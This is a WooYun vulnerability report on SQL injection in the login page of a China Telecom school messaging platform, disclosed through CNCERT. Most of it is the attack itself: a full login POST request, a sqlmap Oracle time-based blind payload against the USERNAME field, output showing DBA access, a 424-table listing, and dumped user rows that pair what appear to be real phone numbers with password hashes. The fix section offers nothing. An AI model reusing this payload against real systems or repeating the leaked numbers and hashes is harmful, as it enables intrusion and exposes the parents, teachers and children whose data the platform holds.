当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080739

漏洞标题:中国电信 某地翼校通 SQL注入

相关厂商:中国电信

漏洞作者: 小饼仔

提交时间:2014-10-27 12:03

修复时间:2014-12-11 12:06

公开时间:2014-12-11 12:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-27: 细节已通知厂商并且等待厂商处理中
2014-10-31: 厂商已经确认,细节仅向厂商公开
2014-11-10: 细节向核心白帽子及相关领域专家公开
2014-11-20: 细节向普通白帽子公开
2014-11-30: 细节向实习白帽子公开
2014-12-11: 细节向公众公开

简要描述:

看到这小朋友就想到自己逝去的青春,哎~
系统里面可以给家长老师发短信,给小朋友布置作业等等,感觉蛮好玩

详细说明:

地址:http://www.qzyixiaotong.com/ischool/login.jsp

翼校通.png


登入处SQL注入
post请求:

POST /ischool/LoginCheck HTTP/1.1
Host: www.qzyixiaotong.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.qzyixiaotong.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://www.qzyixiaotong.com/ischool/login.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: JSESSIONID=90D8FE278C1BF3B9909C6C2CEE5F0E8A; staff_code=aaa; role_type=T; password=; last_login_date=2014/10/20/18; today_login_times=0; JSESSIONID=2DF962D771E9A829EC1BAF07F6EF54E9
RA-Ver: 2.7.0
RA-Sid: 65E7C870-20141014-044958-a23ba1-b78bcc
ROLETYPE=T&USERNAME=aaa&school_id=&PWD=aaa&v_code=


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: USERNAME
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: ROLETYPE=T&USERNAME=a' AND 5464=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(117)||CHR(77)||CHR(119),5) AND 'bqDj'='bqDj&school_id=&PWD=a&v_code=
---
back-end DBMS: Oracle
current user: 'BASEDBA'
current schema (equivalent to database on Oracle): 'BASEDBA'
current user is DBA: True
available databases [17]:
[*] BASEDBA
[*] CENTERBASE
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: BASEDBA
[424 tables]
+-------------------------------+
| LANGUAGE |
| ACTIVITY_INFO |
| ACTIVITY_ORDER |
| ACTIVITY_PAYMENT |
| ACTIVITY_PHONE |
| ACTIVITY_PLAN |
| ACTIVITY_USER_CHANGE_LOG |
| ADS_INFO |
| AD_LOGIN_HIS |
| APP_INFO |
| AREA_INFO |
| ARTICLE |
| ARTICLE_DOC |
| BBS_DOC |
| BBS_REPLY |
| BBS_TOPIC |
| CHAT_MESSAGE |
| CHILD_CLASS |
| CHILD_INFO |
| CLASS_INFO |
| CLIENT_MODULE_DEF |
| CLIENT_MODULE_DETAIL |
| CLIENT_MODULE_INFO |
| CLIENT_MODULE_INFO_EXCULDE |
| CLIENT_MODULE_INFO_INCLUDE |
| CLIENT_MODULE_LOG |
| CLIENT_MODULE_LOG_1402 |
| CLIENT_MODULE_LOG_1403 |
| CLIENT_MODULE_LOG_1404 |
| CLIENT_MODULE_LOG_1405 |
| CLIENT_MODULE_LOG_1406 |
| COMPANY_ACCT |
| COMPANY_INFO |
| COMPOSITION |
| COMPOSITION_DOC |
| CREDIT_CHANGE_FAIL |
| CREDIT_CHANGE_LOG |
| CREDIT_CHANGE_LOG_HIS |
| CREDIT_DJ_REMARK |
| CREDIT_NEW_SCORE_1309 |
| CREDIT_TEACHER_MON |
| CREDIT_TEACHER_MON_BAK1008 |
| CREDIT_TEACHER_MON_LOG |
| CTK_SCHOOL_INFO |
| DOC_LOCATE |
| EDUCATION_COLUMN |
| EDUCATION_LOG |
| EDUCATION_ORG |
| ESSAY_APPRAISE |
| ESSAY_AUTH_LOG |
| ESSAY_AWARD |
| ESSAY_GROUP_INFO |
| ESSAY_INFO |
| ESSAY_INFO_20130524 |
| ESSAY_INFO_DEL |
| ESSAY_INFO_DEL_LOG |
| ESSAY_OP_LOG |
| ESSAY_SCHOOL_INFO |
| ESSAY_SCHOOL_TYPE |
| ESSAY_USER_INFO |
| ESSAY_VOTE |
| EXAM_SCORE |
| EXAM_SCORE_DETAIL |
| EXAM_SCORE_DETAIL_IMP_CHECK |
| FEEDBACK_INFO |
| GLOBAL_EYE_INFO |
| GLOBAL_EYE_LOGININFO |
| GLOBAL_EYE_WATCH_LOG |
| HOMEWORK |
| HOMEWORK_CLASS |
| HOMEWORK_COMMENT |
| HOMEWORK_DOC |
| HOMEWORK_REPLY |
| HONOR_CATALOG |
| HONOR_DOC |
| HONOR_PRAISE_USER |
| HONOR_REPLY |
| HONOR_ROLL |
| IBABY_EXEC_FUNC |
| IBABY_USER_FUNC |
| IBABY_VOTE |
| IBABY_VOTE_OPTION |
| IBABY_VOTE_RESULT |
| IBABY_VOTE_USER |
| IBABY_YIXIN_AUTHCODE |
| IBABY_YIXIN_LOG |
| IBABY_YIXIN_TEAM_MEMBER |
| IBABY_YIXIN_TOKEN |
| IMAN_EXEC_FUNC |
| IMAN_SERV_CONSUME |
| IMAN_SERV_CONSUME_BAK |
| IMAN_SERV_CONSUME_DETAIL |
| IMAN_SERV_CONSUME_DETAIL_BAK |
| IMAN_SERV_CONSUME_IMP_CHECK |
| IMAN_SERV_CONSUME_YX_HIS |
| IMAN_SMS_HIS_TASK |
| IMAN_SMS_HIS_TASK_1401 |
| IMAN_SMS_HIS_TASK_1402 |
| IMAN_SMS_HIS_TASK_1403 |
| IMAN_SMS_HIS_TASK_1404 |
| IMAN_SMS_HIS_TASK_1405 |
| IMAN_SMS_HIS_TASK_1406 |
| IMAN_SMS_HIS_TASK_1407 |
| IMAN_SMS_HIS_TASK_1408 |
| IMAN_SMS_HIS_TEL |
| IMAN_SMS_HIS_TEL_1401 |
| IMAN_SMS_HIS_TEL_1402 |
| IMAN_SMS_HIS_TEL_1403 |
| IMAN_SMS_HIS_TEL_1404 |
| IMAN_SMS_HIS_TEL_1405 |
| IMAN_SMS_HIS_TEL_1406 |
| IMAN_SMS_HIS_TEL_1407 |
| IMAN_SMS_HIS_TEL_1408 |
| IMAN_STAFF_FUNC |
| IMAN_YX_IMP_LOG |
| INTER_JXT |
| INTER_JXT_0001 |
| INTER_JXT_0003 |
| INTER_JXT_1009 |
| INTER_JXT_1010 |
| INTER_JXT_1201 |
| INTER_JXT_1401 |
| INTER_JXT_1402 |
| INTER_JXT_1403 |
| INTER_JXT_1404 |
| INTER_JXT_1405 |
| INTER_JXT_1406 |
| INTER_JXT_1407 |
| INTER_JXT_1408 |
| INTER_JXT_BREAK |
| INTER_JXT_DEVICE |
| INTER_JXT_KQ |
| INTER_JXT_KQ_1009 |
| INTER_JXT_KQ_1010 |
| INTER_JXT_KQ_1401 |
| INTER_JXT_KQ_1402 |
| INTER_JXT_KQ_1403 |
| INTER_JXT_KQ_1404 |
| INTER_JXT_KQ_1405 |
| INTER_JXT_KQ_1406 |
| INTER_JXT_KQ_1407 |
| INTER_JXT_KQ_1408 |
| INTER_JXT_KQ_CLASS |
| INTER_JXT_KQ_CLASS_1401 |
| INTER_JXT_KQ_CLASS_1402 |
| INTER_JXT_KQ_CLASS_1403 |
| INTER_JXT_KQ_CLASS_1404 |
| INTER_JXT_KQ_CLASS_1405 |
| INTER_JXT_KQ_CLASS_1406 |
| INTER_JXT_KQ_CLASS_1407 |
| INTER_JXT_KQ_CLASS_1408 |
| INTER_JXT_TIME_CFG |
| INTER_JXT_TIME_CFG_EX |
| INTER_JXT_TIME_TITLE |
| JJ_VIDEO_ESSAY_INFO |
| JJ_VIDEO_ESSAY_VOTE |
| LANGUAGE_DOC |
| LGL_AX_CHANGED_PSD |
| LGL_CLASS46_BAK |
| LGL_CREDIT_TEACHER_MON |
| LGL_CREDIT_TEACHER_MON_140127 |
| LGL_ESSAY_SCHOOL |
| LGL_JGXX_TEACHER |
| LGL_SCHOOL_STAT_1307 |
| LGL_SMS_0411 |
| LGL_SMS_TEACHER_1401 |
| LGL_SMS_TEL_1401 |
| LGL_TEST |
| LGL_USER_INFO140605 |
| LGL_VALID_USER |
| MEMBER_INFO |
| MEMBER_INFO_IMP_CHECK |
| MEMBER_INFO_LOG |
| MNT_PROCESS_INFO |
| MSG_POOL_PHONE_HIS |
| MSG_RECEIVE |
| MSG_RECEIVE_2014 |
| MSG_SEND |
| MSG_SEND_BAK |
| MSG_SEND_LOG |
| MSG_SEND_LOG_1401 |
| MSG_SEND_LOG_1402 |
| MSG_SEND_LOG_1403 |
| MSG_SEND_LOG_1404 |
| MSG_SEND_LOG_1405 |
| MSG_SEND_LOG_1406 |
| MSG_SEND_LOG_1407 |
| MSG_SEND_LOG_1408 |
| MSG_SEND_SPLIT_LOG |
| MSG_SEND_SPLIT_LOG_1401 |
| MSG_SEND_SPLIT_LOG_1402 |
| MSG_SEND_SPLIT_LOG_1403 |
| MSG_SEND_SPLIT_LOG_1404 |
| MSG_SEND_SPLIT_LOG_1405 |
| MSG_SEND_SPLIT_LOG_1406 |
| MSG_SEND_SPLIT_LOG_1407 |
| MSG_SEND_SPLIT_LOG_1408 |
| MSG_SMGP_RESP |
| MSG_SMGP_RESP_1401 |
| MSG_SMGP_RESP_1402 |
| MSG_SMGP_RESP_1403 |
| MSG_SMGP_RESP_1404 |
| MSG_SMGP_RESP_1405 |
| MSG_SMGP_RESP_1406 |
| MSG_SUBMITRESP_DEL |
| NA_ESSAY_INFO |
| NA_ESSAY_SCHOOL_INFO |
| NA_ESSAY_SCHOOL_TYPE |
| NA_ESSAY_VOTE |
| NEWS_DOC |
| NEWS_INFO |
| NEWS_INFO_BAK130125 |
| NOTICE |
| NOTIFY_DOC |
| NOTIFY_INFO |
| NOTIFY_USER |
| NOTIFY_USER_1220 |
| NOTIFY_USER_CTK |
| ORDER_CHECK_CFG |
| PARENT_CHILD |
| PAY_FEE |
| PAY_INFORM |
| PAY_MERCHANT |
| PAY_ORDER |
| PAY_RECORD_LOG |
| PB_ACTIVE_201401 |
| PB_ACTIVE_201402 |
| PB_BJ_INCREASE |
| PB_CHILD_CLASS_UPGRADE_2014 |
| PB_CHILD_INFO_UPGRADE_2014 |
| PB_CLASS_INFO_UPGRADE_2014 |
| PB_CRM_JZ |
| PB_DJ |
| PB_DJ_LOG_X_20140102 |
| PB_JFDJ_201308 |
| PB_JFDJ_201309 |
| PB_JFDJ_201310 |
| PB_JFDJ_201311 |
| PB_JFDJ_201312 |
| PB_JFDJ_201401 |
| PB_JFDJ_201402 |
| PB_JFDJ_201403 |
| PB_JFDJ_201404 |
| PB_JFDJ_201405 |
| PB_JFDJ_201406 |
| PB_JFDJ_201407 |
| PB_JFDJ_201408 |
| PB_JFDJ_201409 |
| PB_LOGIN_201212 |
| PB_LOGIN_USER |
| PB_MEMBER_INFO_CLASS_X |
| PB_MEMBER_INFO_UPGRADE_2014 |
| PB_MEMBER_NOACCT_2014 |
| PB_NJ_INCREASE |
| PB_PARENT_CHILD_UPGRADE_2014 |
| PB_PUSH_SCHEDULE |
| PB_QKHD_SERV |
| PB_QKHD_SERV_TMP |
| PB_SCHOOL_EXPORT |
| PB_SCHOOL_EXPORT_TASK |
| PB_SCHOOL_KHBBM |
| PB_SCHOOL_TMP |
| PB_SCHOOL_UPGRADE_2013 |
| PB_SCHOOL_UPGRADE_2014 |
| PB_SERV_CONSUME |
| PB_SERV_CONSUME_DETAIL |
| PB_TEACHER_INFO_UPGRADE_2014 |
| PB_TEACHER_MASTER |
| PB_TEACHER_SMS |
| PB_TEST |
| PB_TMP |
| PB_USER_A |
| PB_USER_INFO_UPGRADE_2014 |
| PB_XYQS |
| PB_XYQS_2 |
| PB_YC_DJ_201312 |
| PB_YC_DJ_TEL |
| PB_YC_NBR |
| PB_YDT_USER_201401 |
| PB_YXT_JZ |
| PB_YXT_JZ_BAK |
| PB_YXT_JZ_INCREASE |
| PHOTO_CATALOG |
| PHOTO_DOC |
| PHOTO_PRAISE_USER |
| PHOTO_REPLY |
| PHOTO_SHOW |
| PHOTO_SHOW_BACKUP_20131223 |
| PUSH_SCHEDULE |
| QGDEYU_ESSAY_INFO |
| QGDEYU_ESSAY_REPLY |
| QGDEYU_ESSAY_SCHOOL_TYPE |
| QGDEYU_ESSAY_VOTE |
| QJ_DETAIL |
| QJ_INFO |
| QJ_OPT_LOG |
| QRY_FORM_DEFINE |
| QZ_SCHOOL_INFO |
| SANI_DOC |
| SANI_INFO |
| SCHOOL_HOMEPAGE |
| SCHOOL_INFO |
| SERVICE_INFO |
| SERVICE_ORDER |
| SHARE_TOPIC_LOG |
| SMS_GET_MESSAGE |
| SMS_GET_MESSAGE_2014 |
| SMS_HIS_TASK |
| SMS_HIS_TASK_1401 |
| SMS_HIS_TASK_1402 |
| SMS_HIS_TASK_1403 |
| SMS_HIS_TASK_1404 |
| SMS_HIS_TASK_1405 |
| SMS_HIS_TASK_1406 |
| SMS_HIS_TASK_1407 |
| SMS_HIS_TASK_1408 |
| SMS_HIS_TEL |
| SMS_HIS_TEL_1401 |
| SMS_HIS_TEL_1402 |
| SMS_HIS_TEL_1403 |
| SMS_HIS_TEL_1404 |
| SMS_HIS_TEL_1405 |
| SMS_HIS_TEL_1406 |
| SMS_HIS_TEL_1407 |
| SMS_HIS_TEL_1408 |
| SMS_HIS_TEL_KAKA |
| SMS_HIS_TEL_KAKA_BACKUP_OK |
| SMS_HIS_TEL_KAKA_BAK |
| SMS_MESSAGE |
| SMS_MESSAGE_LOG |
| SMS_MESSAGE_LOG_1401 |
| SMS_MESSAGE_LOG_1402 |
| SMS_MESSAGE_LOG_1403 |
| SMS_MESSAGE_LOG_1404 |
| SMS_MESSAGE_LOG_1405 |
| SMS_MESSAGE_LOG_1406 |
| SMS_MESSAGE_LOG_1407 |
| SMS_MESSAGE_LOG_1408 |
| SMS_SHARE_LOG |
| SPEECH_CATALOG |
| SPEECH_DOC |
| SPEECH_PRAISE_USER |
| SPEECH_REPLY |
| SPEECH_SCORE_USER |
| SPEECH_SHOW |
| STAFF_INFO |
| STATE |
| STAT_CLIENT_MODULE_USE |
| STAT_CREDIT_CHANGE |
| STAT_LOG |
| STAT_LOG_DETAIL |
| STAT_P_USE_DETAIL |
| STAT_P_USE_V |
| STAT_SMS_LOG |
| STAT_SYSTEM_P_USE_DETAIL |
| STAT_SYSTEM_USE |
| STAT_SYSTEM_USE_DETAIL |
| STAT_SYSTEM_USE_M |
| STAT_SYSTEM_USE_MON |
| STAT_SYSTEM_USE_SUB_MON |
| STAT_SYSTEM_USE_V |
| STAT_SYSTEM_USE_V_SUB |
| STAT_SYSTEM_USE_V_SUB_DETAIL |
| STAT_TEMP_UID |
| STAT_USER_DETAIL |
| STAT_USER_DETAIL_V |
| STAT_USER_LOG_T |
| STAT_USER_LOG_V |
| STAT_USER_OPEN_DETAIL |
| STAT_USER_OPEN_REPORT |
| STAT_USER_REPORT |
| SUB_BUREAU_INFO |
| SYS_EXPORT_SCHEMA_01 |
| TEACHER_INFO |
| TEACHER_INFO_LOG |
| TEACHING_PLAN |
| TEACHING_PLAN_DOC |
| TEACHING_PLAN_REPLY |
| TEACHING_RESOURCES |
| TEACHING_RESOURCES_DOC |
| TEACHING_RESOURCES_REPLY |
| TELECOM_HEAD |
| THIRD_PART_COMPONENT |
| THIRD_PART_INFO |
| THIRD_PART_LOG |
| THIRD_PART_PAY |
| TMP_TEACHER |
| TOPIC_CATALOG |
| TRAINING_ORG |
| TXL_LOG_MAIN |
| TXL_LOG_MEMBER_INFO |
| TXL_LOG_TEACHER_INFO |
| TXL_LOG_USER_INFO |
| TXL_OPT_LOG |
| TY_PHONE_INFO |
| USER_CREDIT |
| USER_FAVORITES |
| USER_INFO |
| USER_INFO_LOG |
| USER_LOG |
| USER_LOG_2012 |
| USER_LOG_2013 |
| USER_LOG_2014 |
| USER_LOG_HIS |
| USER_NOTICE |
| USER_OP_LOG |
| USER_REGISTER_LOG |
| USER_SMS_CNT_CHECK |
| VOTE_CLASS |
| V_TEACHER_STAR |
| WORKS_CATALOG |
| WORKS_DOC |
| WORKS_PRAISE_USER |
| WORKS_REPLY |
| WORKS_SCORE_USER |
| WORKS_SHOW |
| WORKS_SHOW_BACKUP_20131223 |
| XLFDZ_VIDEO_ESSAY_INFO |
| YXT_AREA_USE_STAT |
| YXT_SCHOOL_USE_STAT |
| YXT_TEACHER_VIDEO_ESSAY_INFO |
| YXT_TEACHER_VIDEO_ESSAY_VOTE |
| YZF_PAY_RESULT |
| YZF_PAY_WEB_WAP |
+-------------------------------+
表USER_INFO数据
PASSWD USERNAME
eb0011d581f919b2 18986596000
8e808e563f5e8db5 18906993168
70466bc88a146309 18906993286
21d02b46441460c2 18906993286
2679d967ddb3e63a 18959768778
61676f67a3dc0e19 18960321709
7cff82628d333fe3 15396339913
15ef83f404736014 15359834444
2bb166bc482c2911 18959931177
67f60b68b54300d0 15396339917
6606d71ddfee6b90 18959836073
89e330416dd25ba6 18959939527
bba549255c838658 18959935839
7f16e8d750c0a60b 18059502198
a5c6eaf7c32c2277 15392202205
b462b7e23d9e3376 18960327706
2e0833aa78345465 15396339912
e2c3e6d04ef42a8a 18965501686
227a231f0cd6ea8b 15359639968
ac6276818b4d61a8 18965532999
1612196d836e5185 18965660888
ea3142d6a1c5c2f1 18965677000
91e3d58660ca5262 18959990013
84da1358967082ac 18959990000
ce194d64a7a9fafa 15375836368
f3d79b984eab7b31 18965530560
1ab39c0c028ab32e 18960332307
c7921cfadfbd0c52 18959990015
1db38112f25b1da9 18905953678
509764ba55af120e 18965877666
f4e61bc6eb548732 15306956228
04afda0289fdb44d 15396525337
cea8d00ab468eff6 15375872752
65e43161991de9a2 18065311988
7179a751d5f73177 18159201819
cf184fa4ccb2208d 15359521252
7a6c755b092d8b4d 15305958119
bc8a4d5a889df3d0 18159202909
700b276e3430d540 18900315600
ebe6ccc9820a754e 18016687669
908e5228c7fad5ca 18016687618
887adc9e7c9de999 18900315168
5689b788155f895e 18900315258
8fb699ee36dbbf0a 18900315698
dd75728bd819fdb6 18016689770
aa3dc5b9773fe337 15906081056
eb97433ece762883 18905061923
43905834f09d94f3 18059993316
8e28743dab8d54ff 18120698551
a36f7a508dd4a38a 18059993299
fb4da3b9164cc83c 18059993280
1b8cc188c52d8e66 18059993309
dfc9e9237af88fb7 18059993312
9b5bac589752201b 18059993315
90867bf8909a54da 18059993283
5c6e9a840d245d59 18059993273
3c2e6968fc4849af 18059993289
fe69d6125544a964 18059993302
d75e9b2954a21ea0 18059993303
a53e0cfe8a5109cc 18059993313
ad8e9844b6069965 18059993298
f11ab0cb8d03b3da 18959839368

漏洞证明:

修复方案:

你懂得

版权声明:转载请注明来源 小饼仔@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-10-31 17:52

厂商回复:

最新状态:

暂无